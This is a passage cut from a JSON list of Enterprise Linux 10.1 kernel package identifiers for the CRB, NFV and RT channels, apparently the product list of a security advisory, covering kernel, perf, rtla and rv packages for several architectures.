"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
